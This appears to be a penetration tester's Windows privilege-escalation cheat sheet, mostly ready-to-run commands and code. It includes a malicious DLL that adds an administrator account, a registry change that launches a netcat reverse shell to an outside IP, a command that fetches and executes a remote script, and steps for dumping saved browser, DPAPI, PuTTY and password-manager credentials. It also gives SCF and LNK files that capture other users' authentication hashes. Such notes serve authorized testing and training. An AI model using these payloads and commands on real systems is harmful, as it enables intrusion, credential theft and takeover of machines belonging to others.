# Windows ## Enumeration

Tool	Details
WinPEAS	DOWNLOAD. In Metasploit.
PrivescCheck	`powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"` `Get-Content .\PrivescCheck.ps1 \| Out-String \| IEX`
Seatbelt	`.\Seatbelt.exe -group=all`

## Functionality [LOLBAS](https://lolbas-project.github.io/) shows how to exploit vulnerabilities on known programs to perform privileged actions. {% embed url="" %} ## [Groups and Privileges](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-b--privileged-accounts-and-groups-in-active-directory) Privileges should be displayed possibly with privileged shell. {% code overflow="wrap" %} ```powershell whoami /priv ``` {% endcode %} They should be activated with [EnableAllTokenPrivs.ps1](https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1). {% code overflow="wrap" %} ```powershell .\EnableAllTokenPrivs.ps1 ``` {% endcode %} * [SeImpersonate & SeAssignPrimaryToken](https://ivalexev.gitbook.io/rednote/pentesting-process/privilege-escalation/windows-privilege-escalation-with-groups-and-privileges#seimpersonate-and-seassignprimarytoken) * [SeDebug](https://ivalexev.gitbook.io/rednote/pentesting-process/privilege-escalation/windows-privilege-escalation-with-groups-and-privileges#sedebug) * [SeTakeOwnership](https://ivalexev.gitbook.io/rednote/pentesting-process/privilege-escalation/windows-privilege-escalation-with-groups-and-privileges#setakeownership) * [SeBackupPrivilege (Backup Operators)](https://ivalexev.gitbook.io/rednote/pentesting-process/privilege-escalation/windows-privilege-escalation-with-groups-and-privileges#sebackupprivilege-backup-operators) * [Event Log Readers](https://ivalexev.gitbook.io/rednote/pentesting-process/privilege-escalation/windows-privilege-escalation-with-groups-and-privileges#event-log-readers) * [DnsAdmins](https://ivalexev.gitbook.io/rednote/pentesting-process/privilege-escalation/windows-privilege-escalation-with-groups-and-privileges#dnsadmins) * [Print Operators](https://ivalexev.gitbook.io/rednote/pentesting-process/privilege-escalation/windows-privilege-escalation-with-groups-and-privileges#print-operators) * [Server Operators](https://ivalexev.gitbook.io/rednote/pentesting-process/privilege-escalation/windows-privilege-escalation-with-groups-and-privileges#server-operators) * Hyper-V Administrators See [HERE](https://github.com/gtworek/Priv2Admin) for full list. ## Misconfigurations & Weak Permissions Windows misconfigurations and weak permissions are insecure system settings that allow low-privileged users to access, modify, or control resources in ways that can lead to privilege escalation. With PowerUP ([PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) or [Empire](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/privesc/PowerUp.ps1)) {% code overflow="wrap" %} ```powershell . .\PowerUp.ps1; Invoke-AllChecks ``` {% endcode %} ### Modifiable Service Binaries {% code overflow="wrap" %} ```powershell Get-CimInstance -ClassName win32_service | Select Name,State,StartMode,PathName | ? {$_.State -like 'Running'} ``` {% endcode %} {% code overflow="wrap" %} ```powershell wmic service where "state='Running'" get name,state,startmode,pathname ``` {% endcode %} Or with PowerUP ([PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) or [Empire](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/privesc/PowerUp.ps1)) {% code overflow="wrap" %} ```powershell . .\PowerUp.ps1 Get-ModifiableServiceFile ``` {% endcode %} Or with [SharpUp](https://github.com/GhostPack/SharpUp/) {% code overflow="wrap" %} ```powershell .\SharpUp.exe audit # === Modifiable Service Binaries === ``` {% endcode %} Using [icacls](https://ss64.com/nt/icacls.html) we can verify the vulnerability and see if we have full permissions to the directory. {% code overflow="wrap" %} ```powershell icacls "" ``` {% endcode %} At this point we can replace service binary with malicious binary generated with msfvenom. {% code overflow="wrap" %} ```powershell mv "" "" mv "" "" ``` {% endcode %} Start Service. {% code overflow="wrap" %} ```powershell sc.exe stop sc.exe start sc.exe query # for checking after recovery # or net stop net start Restart-Service ``` {% endcode %} If we have the **SeShutdownPrivilege** privilege and the service has *StartMode* set to *Auto*, we can also restart the machine with {% code overflow="wrap" %} ```powershell shutdown /r /t 0 ``` {% endcode %} ### Modifiable Services Path With [SharpUp](https://github.com/GhostPack/SharpUp/) {% code overflow="wrap" %} ```powershell .\SharpUp.exe audit # === Modifiable Service === ``` {% endcode %} Next, we'll use [AccessChk](https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk) from the Sysinternals suite to enumerate permissions on the service. {% code overflow="wrap" %} ```powershell accesschk.exe /accepteula -quvcw ``` {% endcode %} We can use our permissions to change the binary path maliciously. {% code overflow="wrap" %} ```powershell sc.exe config binPath= "cmd /c " ``` {% endcode %} Start service. {% code overflow="wrap" %} ```powershell sc.exe stop sc.exe start sc.exe query # for checking after recovery # or net stop net start Restart-Service ``` {% endcode %} ### Unquoted Service Paths If the path of a binary file of a service contains one or more spaces and is not enclosed in quotes, it can be interpreted in various ways by Windows. It starts from left to right and stops at each space, adding `.exe`. So if we can put a binary file in one of these subdirectories and restart the service, then our binary will be executed.\ Although it's not uncommon to find applications with unquoted service paths, it isn't often exploitable. {% code title="Example" overflow="wrap" %} ``` C:\Program.exe C:\Program Files\Enterprise.exe C:\Program Files\Enterprise Apps\Current.exe C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe ``` {% endcode %} We can **identify** unquoted service binary paths using {% code overflow="wrap" %} ```powershell Get-CimInstance -ClassName win32_service | Select Name,State,StartMode,PathName | ? { $_.PathName -notlike '*"*' -and $_.PathName -notlike 'C:\Windows\*'} ``` {% endcode %} {% code overflow="wrap" %} ```powershell wmic service get name,state,startmode,pathname | findstr /i /v "c:\windows\\" | findstr /i /v """ ``` {% endcode %} Or with PowerUP ([PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) or [Empire](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/privesc/PowerUp.ps1)) {% code overflow="wrap" %} ```powershell . .\PowerUp.ps1 Get-ServiceUnquoted ``` {% endcode %} ### DLL Injection We can: * Overwrite a DLL * Hijack the DLL search order * Exploit a missing DLL {% tabs %} {% tab title="Search Order" %} The default DLL search order used by the system depends on whether `Safe DLL Search Mode` is activated. By default it is enabled. With this mode enabled, applications search for necessary DLL files in the following sequence: 1. The directory from which the application is loaded. 2. The system directory. 3. The 16-bit system directory. 4. The Windows directory. 5. The current directory. 6. The directories that are listed in the PATH environment variable. However, if it is disabled, the search order changes by moving "**The current directory**" from 5 to **2**. {% endtab %} {% tab title="Pinpoint a DLL" %} View service DLLs. See the permissions of those DLLs, whether they are editable and therefore overwritable, or whether they are missing. * [Process Monitor](https://learn.microsoft.com/en-us/sysinternals/downloads/procmon) *(requires elevated privileges)* * [Process Explorer](https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer) *(it also shows DLLs used for each process)* {% endtab %} {% tab title="Malicious DLL" %} Each DLL can have an optional entry point function called `DllMain`, which is executed when processes or threads attach the DLL. This function usually contains four cases called `DLL_PROCESS_ATTACH`, `DLL_THREAD_ATTACH`, `DLL_THREAD_DETACH`, `DLL_PROCESS_DETACH`. {% code title="myDLL.c" overflow="wrap" %} ```cpp #include #include BOOL APIENTRY DllMain( HANDLE hModule,// Handle to DLL module DWORD ul_reason_for_call,// Reason for calling function LPVOID lpReserved ) // Reserved { switch ( ul_reason_for_call ) { case DLL_PROCESS_ATTACH: // A process is loading the DLL. int i; i = system ("net user pwn password123! /add"); i = system ("net localgroup administrators pwn /add"); break; case DLL_THREAD_ATTACH: // A process is creating a new thread. break; case DLL_THREAD_DETACH: // A thread exits normally. break; case DLL_PROCESS_DETACH: // A process unloads the DLL. break; } return TRUE; } ``` {% endcode %} {% code overflow="wrap" %} ```bash x86_64-w64-mingw32-gcc myDLL.c --shared -o myDLL.dll ``` {% endcode %} {% endtab %} {% endtabs %} ### Permissive Registry ACLs It is also worth searching for weak service ACLs in the Windows Registry, with [AccessChk](https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk) from the Sysinternals suite {% code overflow="wrap" %} ```powershell accesschk.exe /accepteula "" -kvuqsw hklm\System\CurrentControlSet\services # RW HKLM\System\CurrentControlSet\services\ModelManagerService # KEY_ALL_ACCESS ``` {% endcode %} We can abuse this using {% code overflow="wrap" %} ```powershell Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443" # start service ``` {% endcode %} ### [Modifiable Registry Autorun Binary](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries) We can use WMIC to see what programs run at system startup. Suppose we have write permissions to the registry for a given binary or can overwrite a binary listed. In that case, we may be able to escalate privileges to another user the next time that the user logs in. {% code overflow="wrap" %} ```powershell Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl ``` {% endcode %} ## File Search for sensitive information in different files {% code overflow="wrap" %} ```powershell dir /s ** ``` {% endcode %} {% code overflow="wrap" %} ```powershell Get-ChildItem -Path C:\Users\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue ``` {% endcode %} {% code overflow="wrap" %} ```powershell tree /f C:\Users ``` {% endcode %} ### unattend.xml {% code overflow="wrap" %} ```powershell dir /s *unattend.xml* ``` {% endcode %} {% code overflow="wrap" %} ```powershell dir /s *autounattend.xml* ``` {% endcode %} ### Application Configuration Files Look for readable configuration files in which passwords can be saved. {% code overflow="wrap" %} ```powershell findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml ``` {% endcode %} {% code overflow="wrap" %} ```powershell findstr /si password *.xml *.ini *.txt *.config ``` {% endcode %} {% code overflow="wrap" %} ```powershell findstr /spin "password" *.* ``` {% endcode %} {% code overflow="wrap" %} ```powershell cd c:\Users\\Documents & findstr /SI /M "password" *.xml *.ini *.txt ``` {% endcode %} {% code overflow="wrap" %} ```powershell select-string -Path C:\Users\\Documents\*.txt -Pattern password ``` {% endcode %} {% code overflow="wrap" %} ```powershell dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* ``` {% endcode %} {% code overflow="wrap" %} ```powershell where /R C:\ *.config ``` {% endcode %} {% code overflow="wrap" %} ```powershell Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore ``` {% endcode %} ### Dictionary Files The user can add words to their dictionary to avoid the distracting red underline, including passwords. {% code overflow="wrap" %} ```powershell gc 'C:\Users\\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String ``` {% endcode %} ### PowerShell Credentials Administrators often need to create automated scripts for users that also contain credentials.\ The credentials are encrypted and protected via DPAPI, which typically means they can only be decrypted by the same user on the same computer they were created on. *Example script* {% code overflow="wrap" %} ```powershell # Connect-VC.ps1 # Get-Credential | Export-Clixml -Path 'C:\scripts\pass.xml' $encryptedPassword = Import-Clixml -Path 'C:\scripts\pass.xml' $decryptedPassword = $encryptedPassword.GetNetworkCredential().Password Connect-VIServer -Server 'VC-01' -User 'bob_adm' -Password $decryptedPassword ``` {% endcode %} If we have gained command execution in the context of this user we can recover the cleartext credentials {% code overflow="wrap" %} ```powershell $credential = Import-Clixml -Path 'C:\scripts\pass.xml' $credential.GetNetworkCredential().username $credential.GetNetworkCredential().password ``` {% endcode %} ### **StickyNotes** {% code overflow="wrap" %} ``` C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite ``` {% endcode %} Copy them to your system and open them with [DB Browser for SQLite](https://sqlitebrowser.org/dl/), or with [PSSQLite](https://github.com/RamblingCookieMonster/PSSQLite) on the target {% code overflow="wrap" %} ```powershell Import-Module .\PSSQLite.psd1 $db = 'C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite' Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap ``` {% endcode %} ### Password Managers **KeePass**, 1Password, Thycotic, CyberArk, etc. {% code overflow="wrap" %} ```powershell dir /s *.kdbx* ``` {% endcode %} {% code overflow="wrap" %} ```bash keepass2john ``` {% endcode %} Crack with hashcat 13400. ### VHDX & VMDK {% code overflow="wrap" %} ```powershell dir /S /B *.vhd == *.vhdx == *.vmdk ``` {% endcode %} {% code overflow="wrap" %} ```powershell Get-ChildItem -Path C:\ -Recurse -Include *.vhd, *.vhdx, *.vmdk -ErrorAction SilentlyContinue ``` {% endcode %} We can get SYSTEM, SAM and SECURITY files. {% tabs %} {% tab title="Mount .vhd & .vhdx" %} {% code overflow="wrap" %} ```bash guestmount --add .vhdx --ro /mnt/vhdx/ [-m /dev/sda1] ``` {% endcode %} {% endtab %} {% tab title="Mount .vmdk" %} {% code overflow="wrap" %} ```bash guestmount -a .vmdk -i --ro /mnt/vmdk ``` {% endcode %} {% endtab %} {% endtabs %} ### Shares SMB With [netexec](https://github.com/Pennyw0rth/NetExec) search for interesting files among the shares. {% code overflow="wrap" %} ```powershell nxc smb -u -p --spider '' --regex '' ``` {% endcode %} ```powershell nxc smb -u -p -M spider_plus ``` *(try again if there are errors)* ## Password Search for passwords saved in the system.

Tool	Details
LaZagne	It searches for passwords. `laZagne.exe all`
SessionGopher	Extract saved PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP credentials. `Import-Module .\SessionGopher.ps1` `Invoke-SessionGopher -Target <MACHINE, es.WINLPE-SRV01>`
Snaffler	It searches for passwords and interesting file. `.\snaffler.exe -s -o snaffler.log [-i]` `.\snaffler.exe -s -d <domain> -o snaffler.log [-i]`

### Browser

Tool	Details
SharpChrome	Retrieve cookies and saved logins from Google Chrome. `.\SharpChrome.exe logins /unprotect`
SharpChromium	Retrieve Chromium data, such as cookies, history and saved logins.
Invoke-SharpChromium	PowerShell script which uses reflection to load SharpChromium. `Import-Module .\Invoke-SharpChromium.ps1` `Invoke-SharpChromium -Command "cookies <SITE>"` If we have a path error, copy the cookie file path that contains the database to the location SharpChromium is expecting.
cookieextractor	Extract cookies from the Firefox cookies.SQLite database. Copy and transfer the DB with cookies to the attacking machine. `copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .`

### Archived Passwords {% code overflow="wrap" %} ```powershell cmdkey /list # take note of user ``` {% endcode %} Connect with `RDP` GUI or with `runas` {% code overflow="wrap" %} ```powershell runas /savecred /user:\ "" ``` {% endcode %} ### Autologon Windows Autologon allows a system to automatically log on to a specific user account, without requiring manual input of the username and password at each startup.\ The username and password are stored in the registry, in clear-text.\ `Autologon.exe` from the `Sysinternals` suite encrypt the password as an LSA secret. {% code overflow="wrap" %} ```powershell reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" ``` {% endcode %} {% code overflow="wrap" %} ```bash nxc smb -u -p -M reg-winlogon ``` {% endcode %} ### Putty For Putty sessions utilizing a proxy connection, when the session is saved, the credentials are stored in the registry in clear text. {% code overflow="wrap" %} ```powershell reg query "HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions" # take note of sessions ``` {% endcode %} {% code overflow="wrap" %} ```powershell reg query "HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\" ``` {% endcode %} if we had admin privileges, we would be able to find it under the corresponding user's hive in `HKEY_USERS`. ### DPAPI The DPAPI (Data Protection API) is an internal component in the Windows system. It allows various applications to store sensitive data (e.g. passwords). The data are stored in the users directory and are secured by user-specific master keys derived from the users password. ```powershell # MASTER KEY ENCRYPTED ls -Hidden C:\Users\\AppData\Roaming\Microsoft\Protect\ ls -Hidden C:\Users\\AppData\Local\Microsoft\Protect\ # PROTECTED FILE ls -Hidden C:\Users\\AppData\Roaming\Microsoft\Credentials\ ls -Hidden C:\Users\\AppData\Local\Microsoft\Credentials\ Get-Content ```

{% tabs %} {% tab title="Linux" %} **IMPORTANT**: Copy files well from windows (ex. use base64)


impacket-dpapi	Extract Master Key `dpapi masterkey -file <MASTERKEY> -sid "<SUID>" -password '<USER_PASS>'` Extract Protected Data wit Master Key `dpapi credential -f <PROTECTED_FILE> -key <MASTERKEY>`

Other tools like [DonPAPI](https://github.com/login-securite/DonPAPI), [dpapick](https://github.com/jordanbtucker/dpapick), [dpapilab](https://github.com/dfirfpi/dpapilab) and [secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py). {% endtab %} {% tab title="Windows" %}


Mimikatz	Extract Master Key `dpapi::masterkey /in:"C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>" /sid:<SID> /password:<PASS> /protected /rpc` Extract Protected Data wit Master Key `dpapi::cred /in:<PROTECTED_FILE> /masterkey:<MASTERKEY>`

See [HERE](https://www.thehacker.recipes/ad/movement/credentials/dumping/dpapi-protected-secrets#practice) and [HERE](https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html). {% endtab %} {% endtabs %} ## Various ### Variables Check environment variables for sensitive information such as passwords or misconfiguration. {% code overflow="wrap" %} ```powershell set ``` {% endcode %} {% code overflow="wrap" %} ```powershell Get-ChildItem Env: | ft key,value ``` {% endcode %} ### History Often administrators clean the history only with `Clear-History`, but this is not enough as it only cleans the `Get-History`, but the history can be found with `PSReadline`. {% code overflow="wrap" %} ```powershell Get-History ``` {% endcode %} {% code overflow="wrap" %} ```powershell (Get-PSReadLineOption).HistorySavePath gc (Get-PSReadLineOption).HistorySavePath ``` {% endcode %} {% code overflow="wrap" %} ``` C:\Users\USER\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt. ``` {% endcode %} {% code overflow="wrap" %} ```powershell foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue} ``` {% endcode %} With Event Viewer to search for events recorded by **Script Block Logging**. ```powershell Get-WinEvent -FilterHashtable @{ LogName = "Microsoft-Windows-PowerShell/Operational" Id = 4104 } | Select-Object -First 10 | Format-List ``` ### Scheduled Tasks {% code overflow="wrap" %} ```powershell Get-ScheduledTask ``` {% endcode %} {% code overflow="wrap" %} ```powershell schtasks /query /fo LIST /v schtasks /query /fo LIST /v | findstr "^$ TaskName Author 'Task To Run'" ``` {% endcode %} {% code overflow="wrap" %} ```powershell Get-ScheduledTask | ? { $_.Author -notmatch 'microsoft' -and $_.Author } | select TaskPath, TaskName, Author, @{n='TaskToRun';e={ $_.Actions.Execute }} schtasks /query /fo LIST /v /tn "" ``` {% endcode %} Unfortunately, we cannot list out scheduled tasks created by other users (such as admins) because they are stored in `C:\Windows\System32\Tasks`.\ Perform an analysis if there are files that can be the target of Scheduled Tasks by Administrator. ### Vulnerable Service & Applications Some services/applications may allow us to escalate to SYSTEM.\ Enumerate the installed applications carefully and check if they contain vulnerabilities.

Programm	Details
`Druva inSync 6.6.3`	CVE-2020-5752 with Invoke-PowerShellTcp.ps1 (see Reverse Shell)
`mRemoteNG`	Used to manage and connect to remote systems using VNC, RDP, SSH, and similar protocols. `%USERPROFILE%\APPDATA\Roaming\mRemoteNG\confCons.xml` (take password in `<NODE>`) Use mRemoteNG-Decrypt `mremoteng_decrypt.py -s "<PASSWORD>"` `mremoteng_decrypt.py -s "<PASSWORD>" -p <MasterPass>` (try brute force MasterPass with wordlists and foreach)

### Always Install Elevated If these 2 registers are enabled (value is 0x1), then users of any privilege can install (execute) `*.msi` files as NT AUTHORITY\SYSTEM. You can add `/v AlwaysInstallElevated` {% code overflow="wrap" %} ```powershell reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer ``` {% endcode %} ```cmd-session reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer ``` {% code overflow="wrap" %} ```powershell reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer ``` {% endcode %} Create `msi` payload with [msfvenom](https://ivalexev.gitbook.io/rednote/software-attacks/shellcode#msfvenom) and run it on target. {% code overflow="wrap" %} ```powershell msiexec /quiet /qn /i myExploit.msi [/norestart] ``` {% endcode %} Or use `Write-UserAddMSI` in PowerUP ([PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) or [Empire](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/privesc/PowerUp.ps1)) {% code overflow="wrap" %} ```powershell Import-Module .\PowerUp.ps1 Write-UserAddMSI .\UserAdd.msi ``` {% endcode %} ### Citrix Breakout {% tabs %} {% tab title="Windows Dialog Boxes" %} It is possible to utilize windows dialog boxes *(with features like Save, Save As, Open, Load, Browse, Import, Export, Help, Search, Scan, Print, etc.)* as a means to bypass the restrictions imposed on users when browsing directories. In `File Name` with `All Files` in File-Type. {% code overflow="wrap" %} ```powershell \\127.0.0.1\c$\ ``` {% endcode %} With [smbserver](https://ivalexev.gitbook.io/rednote/utility/server#smb) on the attacker {% code overflow="wrap" %} ```powershell \\\share ``` {% endcode %} Due to the presence of restrictions within the File Explorer, direct file copying is not viable.\ An alternative approach involves: `right-clicking` > `run` \ Where the executable will open a terminal, as it is the following: {% code overflow="wrap" %} ```c #include int main() { system("C:\\Windows\\System32\\cmd.exe"); } ``` {% endcode %} {% endtab %} {% tab title="Alternative Editor" %} Alternative File System Editors like `Q-Dir` or [`Explorer++`](https://explorerplusplus.com/) can be employed as a workaround. Similarly when the default **Registry Editor** is blocked by group policy, alternative Registry editors can be employed to bypass the standard group policy restrictions. [Simpleregedit](https://sourceforge.net/projects/simpregedit/), [Uberregedit](https://sourceforge.net/projects/uberregedit/) and [SmallRegistryEditor](https://sourceforge.net/projects/sre/) are examples of such GUI tools {% endtab %} {% tab title="Shortcut" %} `Right-click on Shortcut` > `Properties` > `Target` > `C:\\Windows\System32\cmd.exe` Modify Existing Shortcut, also with `.lnk` file. {% endtab %} {% tab title="Script" %} When script extensions such as `.bat`, `.vbs`, or `.ps` are configured to automatically execute their code using their respective interpreters, it opens the possibility of dropping a script that can serve as an interactive console. `New file "evil.bat"` > `Insert "cmd"` > `Save it` > `Run it` {% endtab %} {% endtabs %} See [resources1](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/), [resources2](https://node-security.com/posts/breaking-out-of-windows-environments/) ### Email

Programm	Details
MailSniper	Searching through email in a Microsoft Exchange environment for specific terms.

### Clipboard

Programm	Details
Invoke-Clipboard	Stealing the clipboard `Import-Module .\Invoke-Clipboard.ps1` `Invoke-ClipboardLogger`

### Backup Program

Programm Details

Programm	Details
restic	In `$env:RESTIC_PASSWORD` is saved the password that is used for backup, if it is not present it will be requested each time. `restic.exe -r E:\restic init` (init backup directory) `restic.exe -r E:\restic\ backup C:\FolderToBackup` `--use-fs-snapshot` to create a Volume Shadow Copy for files actively used `restic.exe -r E:\restic\ snapshots` `restic.exe -r E:\restic\ restore <ID> --target C:\RestoreHere`

restic

In $env:RESTIC_PASSWORD is saved the password that is used for backup, if it is not present it will be requested each time.

restic.exe -r E:\restic init (init backup directory)
restic.exe -r E:\restic\ backup C:\FolderToBackup
--use-fs-snapshot to create a Volume Shadow Copy for files actively used

restic.exe -r E:\restic\ snapshots
restic.exe -r E:\restic\ restore <ID> --target C:\RestoreHere

## Interacting with Users ### Passive Traffic

Tool	Details
PCredz	Capture sensitive information from live network traffic, with tcpdump
net-creds	Sniffs sensitive data from interface or pcap

### **Monitoring for Process Command Lines** When getting a shell as a user, there may be scheduled tasks or other processes being executed which pass credentials on the command line. This script captures process command lines every two seconds and compares the current state with the previous state, outputting any differences. {% code title="procmon.ps1" overflow="wrap" %} ```powershell while($true) { $process = Get-WmiObject Win32_Process | Select-Object CommandLine Start-Sleep 1 $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine Compare-Object -ReferenceObject $process -DifferenceObject $process2 } ``` {% endcode %} {% code overflow="wrap" %} ```powershell IEX (iwr 'http://:/procmon.ps1') ``` {% endcode %} ### SCF If there are public folders that are also accessed by other users and that we have write permissions to, we can insert an `.scf` file that is executed every time the folder containing it is opened.\ Using SCFs no longer works on Server 2019 hosts. {% code title=".scf" overflow="wrap" %} ``` [Shell] Command=2 IconFile=\\\share\legit.ico [Taskbar] Command=ToggleDesktop ``` {% endcode %} {% code overflow="wrap" %} ```bash sudo responder -I ``` {% endcode %} ### LNK We can get the same effect as `SCF` using a malicious `.lnk` file.\ We can use various tools to generate a malicious `.lnk` file, such as [Lnkbomb](https://github.com/dievus/lnkbomb), or we can run this code. {% code overflow="wrap" %} ```powershell $objShell = New-Object -ComObject WScript.Shell $lnk = $objShell.CreateShortcut("C:\\.lnk") $lnk.TargetPath = "\\\@pwn.png" $lnk.WindowStyle = 1 $lnk.IconLocation = "%windir%\system32\shell32.dll, 3" $lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request." $lnk.HotKey = "Ctrl+Alt+O" $lnk.Save() ``` {% endcode %} ## Kernel Exploit Kernel Level. \ Depends on Kernel Version and Operating System. \ **May cause crashes!** Examine the installed update and search KB *(Microsoft Knowledge Base ID number)* in [Update Catalog](https://www.catalog.update.microsoft.com/home.aspx) {% code overflow="wrap" %} ```powershell systeminfo wmic qfe list brief Get-Hotfix ``` {% endcode %}

Tool	Details
Sherlock	PowerShell script to quickly find missing software patches. `Import-Module .\Sherlock.ps1` `Find-AllVulns`
Watson	Enumerate missing KBs and suggest exploits.
wesng	Windows Exploit Suggester.
Windows-Exploit-Suggester	Python script for detect potential missing patches. `python2.7 windows-exploit-suggester.py --update` Save `systeminfo` output from target windows system. `python2.7 windows-exploit-suggester.py --database <DB.xlsx> --systeminfo <SYSTEMINFO.txt>`

See [Windows-CVE](https://ivalexev.gitbook.io/rednote/pentesting-process/cve/windows) section.